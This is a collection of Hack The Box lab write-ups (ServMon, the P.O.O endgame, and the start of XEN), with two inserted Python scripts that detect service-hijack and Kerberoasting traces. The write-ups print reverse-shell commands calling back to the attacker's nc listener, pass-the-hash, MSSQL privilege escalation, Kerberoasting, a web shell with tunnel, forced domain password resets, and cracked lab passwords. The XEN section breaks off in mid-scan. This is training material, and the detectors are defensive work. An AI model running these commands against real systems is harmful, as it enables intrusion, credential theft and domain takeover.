htb-servmon-nl

htb-servmon

As always we start with an nmap scan.

We can log in to FTP anonymously and find confidential.txt in ftp://10.10.10.184/Nathan:

Nathan,

I left your Passwords.txt file on your Desktop. Please remove this once you have edited it yourself and place it back into the secure folder.

Regards

Nadine

 

The LFI is https://www.exploit-db.com/exploits/47774

so we have the passwords

L1k3B1gBut7s@W0rk is the password for user Nadine for the service

 

ssh nadine@10.10.10.184 with the password L1k3B1gBut7s@W0rk

Next we upload nc.exe to the box, then follow https://www.exploit-db.com/exploits/46802:

C:\Program Files\NSClient++>nscp web -- password --display
Current password: ew2x6SsGTxjRwXOT
This is the password for the login page on port 8443.

curl -s -k -u admin -X PUT https://localhost:8443/api/v1/scripts/ext/scripts/testpuck.bat --data-binary "c:\temp\nc.exe 10.10.14.13 443 -e cmd.exe"

or run:

E:\PENTEST>psexec_windows -hashes :c8bbef7fd5afe37cbb1aee2264a75fee Administrator@10.10.10.184
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

[*] Requesting shares on 10.10.10.184.....
[*] Found writable share ADMIN$
[*] Uploading file TEhcBLUe.exe
[*] Opening SVCManager on 10.10.10.184.....
[*] Creating service Lofh on 10.10.10.184.....
[*] Starting service Lofh.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>cd c:\users\administrator\desktop

c:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is 728C-D22C

Directory of c:\Users\Administrator\Desktop

08/04/2020 23:12 <DIR> .
08/04/2020 23:12 <DIR> ..
15/04/2020 05:58 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 27,399,426,048 bytes free

c:\Users\Administrator\Desktop>type root.txt
62fb102b67c0760ac03f1cf05616dc65

c:\Temp>cqh -samdump
SAM hashes:

Another way:

Enumerating the current user shows that the "Server Operators" group can read and write system services, and can modify services that run with SYSTEM permissions and start them. Hence the idea: find a SYSTEM service that has not been started, replace its binary with a trojan or nc, and then start it:

*Evil-WinRM* PS C:\temp> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SensorDataService" /v ImagePath /t REG_EXPAND_SZ /d "C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd" /f
The operation completed successfully.

*Evil-WinRM* PS C:\temp> sc.exe start SensorDataService

C:\Users\jacco>nc -nlvp 9876
listening on [any] 9876 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.184] 49687
Microsoft Windows [Version 10.0.18363.752]
(c) 2019 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\WINDOWS\system32>hostname
hostname
ServMon

C:\WINDOWS\system32>
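A defender-side check for the service ImagePath abuse shown above, added here as an example and not part of the original writeup: it audits service name -> ImagePath pairs (as collected with reg query or Get-ItemProperty on each service key) and flags the traces such a rewrite leaves behind. The sample services are constructed; the SensorDataService entry mirrors the value set in the session above, and the trusted/writable directory lists are assumptions.

```python
"""Audit Windows service ImagePath values for signs of service hijacking."""
import re
from typing import Dict, List, Tuple

# Directories a service binary is normally installed in (compared lower-case).
TRUSTED_PREFIXES = (
    r"c:\windows\system32",
    r"c:\windows\syswow64",
    r"c:\program files",          # also covers "c:\program files (x86)"
)
# Locations a low-privileged user can write to; a service started from here is a red flag.
WRITABLE_DIRS = (r"c:\windows\temp", r"c:\temp", r"c:\users\public", r"\appdata\local\temp")
# Tool names and switches that do not belong in a service command line.
SUSPICIOUS_TOKENS = ("nc.exe", "nc64.exe", "cmd.exe", " -e cmd", "powershell", "mshta", "rundll32")
IPV4_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")


def split_command(image_path: str) -> Tuple[str, str]:
    """Split an ImagePath into (executable, arguments).

    Expands the two variables that commonly appear in ImagePath, honours a
    quoted executable, and for an unquoted path takes everything up to the
    first ".exe" so that "C:\\Program Files\\X\\y.exe /svc" is not cut at the space.
    """
    path = image_path.strip()
    path = re.sub(r"%systemroot%|%windir%", r"c:\\windows", path, flags=re.IGNORECASE)
    quoted = re.match(r'"([^"]+)"\s*(.*)', path)
    if quoted:
        return quoted.group(1), quoted.group(2)
    end = path.lower().find(".exe")
    if end != -1:
        return path[: end + 4], path[end + 4:].strip()
    head, _, tail = path.partition(" ")
    return head, tail


def audit_service(name: str, image_path: str) -> List[str]:
    """Return the findings for one service; an empty list means nothing stood out."""
    exe, args = split_command(image_path)
    exe_l, full_l = exe.lower(), image_path.lower()
    findings = []
    if not exe_l.startswith(TRUSTED_PREFIXES):
        findings.append("binary outside trusted directories")
    if any(d in exe_l for d in WRITABLE_DIRS):
        findings.append("binary in a user-writable location")
    if any(t in full_l for t in SUSPICIOUS_TOKENS):
        findings.append("command line resembles a shell or network tool")
    if " " in exe and not image_path.strip().startswith('"'):
        findings.append("unquoted path containing spaces")
    if IPV4_RE.search(args):
        findings.append("IP address in service arguments")
    return findings


def audit_services(services: Dict[str, str]) -> Dict[str, List[str]]:
    """Audit every service and keep only those with findings."""
    result = {}
    for name, image_path in services.items():
        findings = audit_service(name, image_path)
        if findings:
            result[name] = findings
    return result


# Constructed sample; SensorDataService mirrors the ImagePath written in the session above.
SAMPLE_SERVICES = {
    "SensorDataService": r"C:\Windows\Temp\nc.exe 10.10.14.13 9876 -e cmd",
    "Spooler": r"%SystemRoot%\System32\spoolsv.exe",
    "wuauserv": r'"C:\WINDOWS\system32\svchost.exe" -k netsvcs -p',
    "VendorAgent": r"C:\Program Files\Vendor Agent\agent.exe /service",
}

if __name__ == "__main__":
    for svc, problems in audit_services(SAMPLE_SERVICES).items():
        print(f"{svc}: {', '.join(problems)}")
```

On a live host the same rewrite also shows up as a registry SetValue on the service's ImagePath (Sysmon event 13) followed by a service start, which is the pair worth alerting on.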

Author : Puckiestyle

htb-endgame-poo

Hack the Box – P.O.O (writeup, box retired in June 2020)

As usual I add the IP of the machine 10.13.38.11 to /etc/hosts as poo.htb.
NMAP
To start off with, I perform a port discovery to see what I could find.
nmap -p- -sT -sV -sC -oN initial-scan 10.13.38.11

A few ports are open. I chose not to perform a UDP scan at this point in the exercise. We have HTTP on port 80 and MSSQL on 1433.
Overview of Web Services
Let’s take a quick look at the webpages to see what we have. I got the following on port 80.

I didn’t have much to go on, so I decided to do some directory enumeration.
Directory Enumeration
I used wfuzz in this case because gobuster didn’t come up with anything useful.
wfuzz --hc 404 -w raft-small-words.txt http://10.13.38.11/FUZZ

wfuzz --hc 404 -w /usr/share/seclists/Discovery/Web-Content/SVNDigger/all.txt http://poo.htb/FUZZ

The interesting ones to look at seemed to be the 'admin' folder and the '.DS_Store' file, simply because admin indicates an area of privilege and .DS_Store files generally hold information about the folder they reside in.
Admin Directory
I browsed to http://10.13.38.11/admin and was presented with a logon.

I chose not to try and brute force this at this point and looked at the other files I could potentially utilise.

Reading Directories
Knowing the DS_Store files contain information, I read the file to see what it contained. I did this by using https://github.com/lijiejie/ds_store_exp

python ds_store_exp.py http://10.13.38.11/.DS_Store

We have some interesting directories. I ran the IIS Shortname scanner located at https://github.com/irsdl/IIS-ShortName-Scanner to see if I could come up with anything interesting, and one specific directory came up with good information.

java -jar iis_shortname_scanner.jar 2 20 http://10.13.38.11/dev/dca66d38fd916317687e1390a420c3fc/db/

I tried a couple of filenames and then hit the jackpot with poo_connection.txt.


These seemed to be the connection details for a SQL database. And we have our first flag.
POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SERVER=10.13.38.11
USERID=external_user
DBNAME=POO_PUBLIC
USERPWD=#p00Public3xt3rnalUs3r#

Flag : POO{fcfb0767f5bd3cbc22f40ff5011ad555}

SQL Access
For SQL access, I booted up my Windows machine and used SQL Management studio. I attempted to log in with the details that we found.

And we have a successful login.
I then proceeded to create a new user puckie for myself.

Now that I had created the user, I attempted to log in as the new user.
Now that I was logged in as a new user, I could see we had an additional database called flag.
USE flag
SELECT * FROM dbo.flag
This gave us another flag.
POO{88d829eb39f2d11697e689d779810d42}

Creating a SQL user puckie in SQL Management Studio:

EXEC ('select current_user') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select name,sysadmin from syslogins') at [COMPATIBILITY\POO_CONFIG];
EXEC ('select srvname,isremote from sysservers') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''select suser_name()'') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addlogin ''''puckie'''', ''''abc123!'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];
EXEC ('EXEC (''EXEC sp_addsrvrolemember ''''puckie'''', ''''sysadmin'''''') at [COMPATIBILITY\POO_PUBLIC]') at [COMPATIBILITY\POO_CONFIG];

 

SHELL Access
I needed to enable xp_cmdshell


Now that I had sysadmin rights on the box, I decided to use https://alamot.github.io/mssql_shell/ to try and gain a shell on the box.
python3 mssql_shell.py (from https://github.com/puckiestyle/python/blob/master/mssql_shell.py)

I was unable to read anything from the web.config file. I tried to output it but got Access Denied.


After a little bit of looking around on the system, I noticed that Python seemed to be installed.

xp_cmdshell whoami

EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("whoami");';
EXEC sp_execute_external_script @language = N'Python', @script = N'import os;os.system("type c:\inetpub\wwwroot\web.config");';

Admin Page


Finding this easier to do within SQL Management Studio, I tried reading the contents of the web.config file.
And this gave us the contents of the config file which showed a username and password.
Administrator EverybodyWantsToWorkAtP.O.O.
I immediately went back to the admin page and attempted to log in with the details shown.
A successful login to the page revealed the next flag.


POO{4882bd2ccfd4b5318978540d9843729f}

IPv6 and WinRM
I tried everything to get a good reverse shell on the box, but it seemed the firewall was blocking all traffic.
netsh advfirewall firewall show rule name="Block network access for R local user accounts in SQL Server instance POO_PUBLIC"


And then I noticed an IPv6 address and another adapter.


I performed an additional scan on the IPv6 address.

kali@kali:~/htb$ nmap -p- -6 -oN ipv6-scan dead:babe::1001
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-16 05:40 EDT
Stats: 0:00:16 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 9.44% done; ETC: 05:43 (0:02:34 remaining)
Nmap scan report for dead:babe::1001
Host is up (0.026s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE
80/tcp open http
1433/tcp open ms-sql-s
5985/tcp open wsman

Nmap done: 1 IP address (1 host up) scanned in 104.66 seconds

I noticed there was an additional port open. We have WinRM on 5985. I had credentials and now tried to access this through WinRM. I made the necessary changes to my hosts file first.

dead:babe::1001 poov6.htb

I decided to use alamot winrm located at https://github.com/Alamot/code-snippets/blob/master/winrm/winrm_shell_with_upload.rb for this.
I changed the required fields and attempted to connect.

ruby winrm_shell_with_upload.rb

Or use Evil-WinRM to find the 4th flag:

kali@kali:/opt/evil-winrm$ ruby evil-winrm.rb -i poov6.htb -u Administrator -p 'EverybodyWantsToWorkAtP.O.O.'

Evil-WinRM shell v2.3
Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type flag.txt
POO{ff87c4fe10e2ef096f9a96a01c646f8f}

I wanted to see what I could find out about the domain. Knowing that the box is on a domain, I was hoping for some Kerberos tokens that I could potentially crack. I would have to utilise the MSSQL account that I had created earlier.

Kerberoasting
I logged back in through the SQL Shell that I had earlier.

powershell.exe -NoP -NonI -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('c:\temp\kerberoasting.ps1');Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat

This came back with 2 accounts.

This one was named p00_hr.

This one was named p00_adm.


I copied the contents of these tokens to separate files named user-p00_hr and user-p00_adm.
Now I had to try and crack the passwords on these.

Hashcat
I proceeded to run these 2 tokens through hashcat with the best64 rule.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt rockyou.txt --force -r /usr/share/hashcat/rules/best64.rule

The p00_hr account came back quickly.
p00_hr:Password123!

However, when I ran the p00_adm account through rockyou, it did not return any results. I then decided to run the token through all passwords found in all text files within the SecLists folders.

hashcat -m 13100 -a 0 --outfile hr.txt p00_adm.txt /opt/SecLists/Passwords/*.txt --force -r /usr/share/hashcat/rules/best64.rule

And this eventually found a result in the Keyboard-Combinations.txt file.
p00_adm:ZQ!5t4r
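The detection counterpart of the Kerberoasting run above, added here as an example and not part of the original writeup: Invoke-Kerberoast asks the KDC for a service ticket for every account with an SPN and requests RC4 (TicketEncryptionType 0x17), which is the $krb5tgs$23$ format that hashcat mode 13100 cracks; on the domain controller that appears as a burst of Security event 4769 records from one requester, one per user service account, all RC4. The records below are constructed (requester names, timestamps and IPs are assumptions); the field names follow the 4769 event XML.

```python
"""Flag Kerberoasting bursts in Windows Security event 4769 records."""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

RC4_ETYPES = {"0x17"}                 # RC4-HMAC; AES tickets are 0x11 / 0x12
BURST_WINDOW = timedelta(minutes=5)
MIN_DISTINCT_SERVICES = 2             # one RC4 request may be a legacy client; several in a burst is not


def is_roastable_request(ev: Dict[str, str]) -> bool:
    """True when the 4769 describes a successful RC4 ticket for a user service account,
    i.e. a TGS-REP whose encrypted part can be cracked offline."""
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False                  # machine accounts and the TGT service are not roast targets
    if ev.get("Status", "0x0") != "0x0":
        return False                  # failed requests return no ticket
    return ev["TicketEncryptionType"].lower() in RC4_ETYPES


def find_kerberoast_bursts(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group roastable requests by requesting account (TargetUserName) and return the
    requesters that touched MIN_DISTINCT_SERVICES or more distinct service accounts
    inside BURST_WINDOW, together with the services they requested."""
    per_requester = defaultdict(list)
    for ev in events:
        if is_roastable_request(ev):
            ts = datetime.fromisoformat(ev["TimeCreated"])
            per_requester[ev["TargetUserName"]].append((ts, ev["ServiceName"]))
    findings = {}
    for user, reqs in per_requester.items():
        reqs.sort()
        for i, (start, _) in enumerate(reqs):
            in_window = {svc for ts, svc in reqs[i:] if ts - start <= BURST_WINDOW}
            if len(in_window) >= MIN_DISTINCT_SERVICES:
                findings[user] = sorted(in_window)
                break
    return findings


def _ev(ts, requester, service, etype, ip="::ffff:172.20.128.2", status="0x0"):
    """Build one constructed 4769 record."""
    return {"TimeCreated": ts, "TargetUserName": requester, "ServiceName": service,
            "TicketEncryptionType": etype, "IpAddress": ip, "Status": status}


# Constructed sample: the sqlsvc burst mirrors what the Invoke-Kerberoast run above would
# produce for the two SPN accounts it returned; the other records are ordinary traffic.
SAMPLE_4769 = [
    _ev("2020-04-16T09:30:00", "alice@POO", "p00_hr", "0x12"),      # AES ticket, legitimate use
    _ev("2020-04-16T10:00:01", "sqlsvc@POO", "p00_hr", "0x17"),     # RC4 for SPN account 1
    _ev("2020-04-16T10:00:02", "sqlsvc@POO", "p00_adm", "0x17"),    # RC4 for SPN account 2
    _ev("2020-04-16T10:00:03", "sqlsvc@POO", "DC$", "0x17"),        # machine account, ignored
    _ev("2020-04-16T10:00:04", "sqlsvc@POO", "krbtgt", "0x17"),     # TGT service, ignored
    _ev("2020-04-16T11:00:00", "bob@POO", "p00_adm", "0x17"),       # single RC4 request, below threshold
    _ev("2020-04-16T11:00:01", "bob@POO", "p00_hr", "0x17", status="0x1b"),  # failed request, no ticket
]

if __name__ == "__main__":
    for requester, services in find_kerberoast_bursts(SAMPLE_4769).items():
        print(f"possible Kerberoast by {requester}: {', '.join(services)}")
```

A service account restricted to AES via msDS-SupportedEncryptionTypes never yields a 0x17 ticket, so any RC4 ticket for such an account is a finding on its own.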

Now that I had both of these passwords cracked, I needed to try and gain access to the domain controller, which was on 172.20.128.53.

Domain details
I now uploaded PowerView.ps1 to the temp folder and imported it into PowerShell.
Import-Module .\PowerView.ps1


Once I had created all the variables necessary, I then tried to get the user information on the domain.

get-netuser -DomainController dc -Credential $cred

Looking through the list of users on the domain, I noticed one which was interesting.
This was an account named mr3ks.


PowerView / Domain Password
After looking at the powerview version that I was using, I found another version that seemed a little more user friendly at https://github.com/EmpireProject/Empire/blob/master/data/module_source/situational_awareness/network/powerview.ps1

This also gave me the option to set domain user passwords. I was not aware if I had the relevant permissions to set a user password yet, but I thought I would give it a shot.

UPLOAD /opt/htb/endgame/poo/sdup.ps1 c:\temp\sdup.ps1
Import-Module .\PowerView.ps1
$Username = 'p00_adm'
$Password = 'ZQ!5t4r'
$pass = ConvertTo-SecureString -AsPlainText $Password -Force
$Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass
Set-DomainUserPassword -Identity mr3ks -Password $pass -Credential $Cred

I didn’t get an error from this; therefore, I can only assume at this point that the password change has been successful. I tried to connect via PowerShell but this did not seem to want to connect.

reGeorg
I was now forced to try and get a tunnel running to see if this would help with the WinRM situation. I uploaded the aspx shell into the web root folder:

UPLOAD /opt/tunnels/tunnel.aspx c:\inetpub\wwwroot\shell.aspx


I then browsed to the tunnel to see if it would activate.

To my surprise, it worked. Now to create my tunnel with reGeorg.

python ./reGeorgSocksProxy.py -p 10000 -u http://10.13.38.11/tunnel.aspx


I knew the IP of the Domain Controller from earlier, therefore I changed the WinRM scripts to reflect this and input the mr3ks username and password.

proxychains ruby winrmdc_shell_with_ipload.rb

This provided me with direct access to the Domain Controller as a domain admin.
I could now look for the final flag.
POO{1196ef8bc523f084ad1732a38a0851d6}

This exercise got me from being on the outside of the network with simply HTTP and MSSQL as the open ports, to then being able to take complete control of the domain.
Notes
If aspx or asp files fail to execute, look at the operating system. In this case it was 2016.
(get-wmiobject win32_operatingsystem).name
If this is the case, and you have admin rights like we did here, then you can install the .NET tools to get the aspx executing. To do this, in a shell, simply type:
dism /online /enable-feature /featurename:NetFx4Extended-ASPNET45 -All

Extra:

kali@kali:~/htb$ python mssqlclient.py -p 1433 external_user:#p00Public3xt3rnalUs3r#@10.13.38.11 
Impacket v0.9.22.dev1+20200327.103853.7e505892 - Copyright 2020 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed database context to 'master'.
[*] INFO(COMPATIBILITY\POO_PUBLIC): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 7235) 
[!] Press help for extra shell commands
SQL> help

lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd

SQL>


msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum_domain_accounts) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Attempting to connect to the database server at 10.13.38.11:1433 as external_user...
[+] 10.13.38.11:1433 - Connected.
[*] 10.13.38.11:1433 - SQL Server Name: COMPATIBILITY
[*] 10.13.38.11:1433 - Domain Name: POO
[+] 10.13.38.11:1433 - Found the domain sid: 010500000000000515000000af91e18f681dda440dfef7b0
[*] 10.13.38.11:1433 - Brute forcing 10000 RIDs through the SQL Server, be patient...
[*] 10.13.38.11:1433 - - POO\Administrator
[*] 10.13.38.11:1433 - - POO\Guest
[*] 10.13.38.11:1433 - - POO\krbtgt
[*] 10.13.38.11:1433 - - POO\DefaultAccount
[*] 10.13.38.11:1433 - - POO\Domain Admins
[*] 10.13.38.11:1433 - - POO\Domain Users
[*] 10.13.38.11:1433 - - POO\Domain Guests
[*] 10.13.38.11:1433 - - POO\Domain Computers
[*] 10.13.38.11:1433 - - POO\Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cert Publishers
[*] 10.13.38.11:1433 - - POO\Schema Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Admins
[*] 10.13.38.11:1433 - - POO\Group Policy Creator Owners
[*] 10.13.38.11:1433 - - POO\Read-only Domain Controllers
[*] 10.13.38.11:1433 - - POO\Cloneable Domain Controllers
[*] 10.13.38.11:1433 - - POO\Protected Users
[*] 10.13.38.11:1433 - - POO\Key Admins
[*] 10.13.38.11:1433 - - POO\Enterprise Key Admins
[*] 10.13.38.11:1433 - - POO\RAS and IAS Servers
[*] 10.13.38.11:1433 - - POO\Allowed RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\Denied RODC Password Replication Group
[*] 10.13.38.11:1433 - - POO\mr3ks
[*] 10.13.38.11:1433 - - POO\DC$
[*] 10.13.38.11:1433 - - POO\DnsAdmins
[*] 10.13.38.11:1433 - - POO\DnsUpdateProxy
[*] 10.13.38.11:1433 - - POO\COMPATIBILITY$
[*] 10.13.38.11:1433 - - POO\p00_hr
[*] 10.13.38.11:1433 - - POO\p00_dev
[*] 10.13.38.11:1433 - - POO\p00_adm
[*] 10.13.38.11:1433 - - POO\P00 Help Desk
[+] 10.13.38.11:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.13.38.11:1433 - Query results have been saved to: /home/kali/.msf4/loot/20200416050427_default_10.13.38.11_mssql.domain.acc_738433.txt
[*] Auxiliary module execution completed


msf5 auxiliary(admin/mssql/mssql_enum) > set password #p00Public3xt3rnalUs3r#
password => #p00Public3xt3rnalUs3r#
msf5 auxiliary(admin/mssql/mssql_enum) > set rhosts 10.13.38.11
rhosts => 10.13.38.11
msf5 auxiliary(admin/mssql/mssql_enum) > set username external_user
username => external_user
msf5 auxiliary(admin/mssql/mssql_enum) > run
[*] Running module against 10.13.38.11

[*] 10.13.38.11:1433 - Running MS SQL Server Enumeration...
[*] 10.13.38.11:1433 - Version:
[*] Microsoft SQL Server 2017 (RTM-GDR) (KB4505224) - 14.0.2027.2 (X64) 
[*] Jun 15 2019 00:26:19 
[*] Copyright (C) 2017 Microsoft Corporation
[*] Standard Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.13.38.11:1433 - Configuration Parameters:
[*] 10.13.38.11:1433 - C2 Audit Mode is Not Enabled
[*] 10.13.38.11:1433 - xp_cmdshell is Enabled
[*] 10.13.38.11:1433 - remote access is Enabled
[*] 10.13.38.11:1433 - allow updates is Not Enabled
[*] 10.13.38.11:1433 - Database Mail XPs is Not Enabled
[*] 10.13.38.11:1433 - Ole Automation Procedures are Not Enabled
[*] 10.13.38.11:1433 - Databases on the server:
[*] 10.13.38.11:1433 - Database name:master
[*] 10.13.38.11:1433 - Database Files for master:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\master.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\mastlog.ldf
[*] 10.13.38.11:1433 - Database name:tempdb
[*] 10.13.38.11:1433 - Database Files for tempdb:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\templog.ldf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_2.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_3.ndf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\tempdb_mssql_4.ndf
[*] 10.13.38.11:1433 - Database name:POO_PUBLIC
[*] 10.13.38.11:1433 - Database Files for POO_PUBLIC:
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_dat.mdf
[*] 10.13.38.11:1433 - C:\Program Files\Microsoft SQL Server\MSSQL14.POO_PUBLIC\MSSQL\DATA\poo_public_log.ldf
[*] 10.13.38.11:1433 - System Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - Disabled Accounts:
[*] 10.13.38.11:1433 - No Disabled Logins Found
[*] 10.13.38.11:1433 - No Accounts Policy is set for:
[*] 10.13.38.11:1433 - All System Accounts have the Windows Account Policy Applied to them.
[*] 10.13.38.11:1433 - Password Expiration is not checked for:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - external_user
[*] 10.13.38.11:1433 - System Admin Logins on this Server:
[*] 10.13.38.11:1433 - sa
[*] 10.13.38.11:1433 - Windows Logins on this Server:
[*] 10.13.38.11:1433 - No Windows logins found!
[*] 10.13.38.11:1433 - Windows Groups that can logins on this Server:
[*] 10.13.38.11:1433 - No Windows Groups where found with permission to login to system.
[*] 10.13.38.11:1433 - Accounts with Username and Password being the same:
[*] 10.13.38.11:1433 - No Account with its password being the same as its username was found.
[*] 10.13.38.11:1433 - Accounts with empty password:
[*] 10.13.38.11:1433 - No Accounts with empty passwords where found.
[*] 10.13.38.11:1433 - Stored Procedures with Public Execute Permission found:
[*] 10.13.38.11:1433 - sp_replsetsyncstatus
[*] 10.13.38.11:1433 - sp_replcounters
[*] 10.13.38.11:1433 - sp_replsendtoqueue
[*] 10.13.38.11:1433 - sp_resyncexecutesql
[*] 10.13.38.11:1433 - sp_prepexecrpc
[*] 10.13.38.11:1433 - sp_repltrans
[*] 10.13.38.11:1433 - sp_xml_preparedocument
[*] 10.13.38.11:1433 - xp_qv
[*] 10.13.38.11:1433 - xp_getnetname
[*] 10.13.38.11:1433 - sp_releaseschemalock
[*] 10.13.38.11:1433 - sp_refreshview
[*] 10.13.38.11:1433 - sp_replcmds
[*] 10.13.38.11:1433 - sp_unprepare
[*] 10.13.38.11:1433 - sp_resyncprepare
[*] 10.13.38.11:1433 - sp_createorphan
[*] 10.13.38.11:1433 - xp_dirtree
[*] 10.13.38.11:1433 - sp_replwritetovarbin
[*] 10.13.38.11:1433 - sp_replsetoriginator
[*] 10.13.38.11:1433 - sp_xml_removedocument
[*] 10.13.38.11:1433 - sp_repldone
[*] 10.13.38.11:1433 - sp_reset_connection
[*] 10.13.38.11:1433 - xp_fileexist
[*] 10.13.38.11:1433 - xp_fixeddrives
[*] 10.13.38.11:1433 - sp_getschemalock
[*] 10.13.38.11:1433 - sp_prepexec
[*] 10.13.38.11:1433 - xp_revokelogin
[*] 10.13.38.11:1433 - sp_execute_external_script
[*] 10.13.38.11:1433 - sp_resyncuniquetable
[*] 10.13.38.11:1433 - sp_replflush
[*] 10.13.38.11:1433 - sp_resyncexecute
[*] 10.13.38.11:1433 - xp_grantlogin
[*] 10.13.38.11:1433 - sp_droporphans
[*] 10.13.38.11:1433 - xp_regread
[*] 10.13.38.11:1433 - sp_getbindtoken
[*] 10.13.38.11:1433 - sp_replincrementlsn
[*] 10.13.38.11:1433 - Instances found on this server:
[*] 10.13.38.11:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.13.38.11:1433 - xp_regread might be disabled in this system
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mssql/mssql_enum) >

Author – Puckiestyle

 

htb-endgame-xen

Hack the Box – XEN (retired June 2020)

First I add the IP of the machine 10.13.38.12 to /etc/hosts as xen.htb.

NMAP

As always we start with an nmap scan.

E:\PENTEST>nmap -A -oN htb-endgame-xen 10.13.38.12
Starting Nmap 7.70 ( https://nmap.org ) at 2020-04-09 14:41 W. Europe Summer Time
Stats: 0:00:43 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 14:42 (0:00:11 remaining)
Nmap scan report for humongousretail.com (10.13.38.12)
Host is up (0.024s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
25/tcp open smtp
| fingerprint-strings:
| GenericLines, GetRequest:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| sequence of commands
| sequence of commands
| Hello:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| EHLO Invalid domain address.
| Help:
| 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
| NULL:
|_ 220 ESMTP MAIL Service ready (EXCHANGE.HTB.LOCAL)
| smtp-commands: CITRIX, SIZE 20480000, AUTH LOGIN, HELP,
|_ 211 DATA HELO EHLO MAIL NOOP QUIT RCPT RSET SAML TURN VRFY
80/tcp open http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
443/tcp open ssl/http Microsoft IIS httpd 7.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Humongous Retail
| ssl-cert: Subject: commonName=humongousretail.com
| Subject Alternative Name: DNS:humongousretail.com
| Not valid before: 2019-03-31T21:05:35
|_Not valid after: 2039-03-31T21:15:35
|_ssl-date: 2020-04-09T12:42:58+00:00; +9s from scanner time.
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_RC4_128_WITH_MD5
|_ SSL2_DES_192_EDE3_CBC_WITH_MD5
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
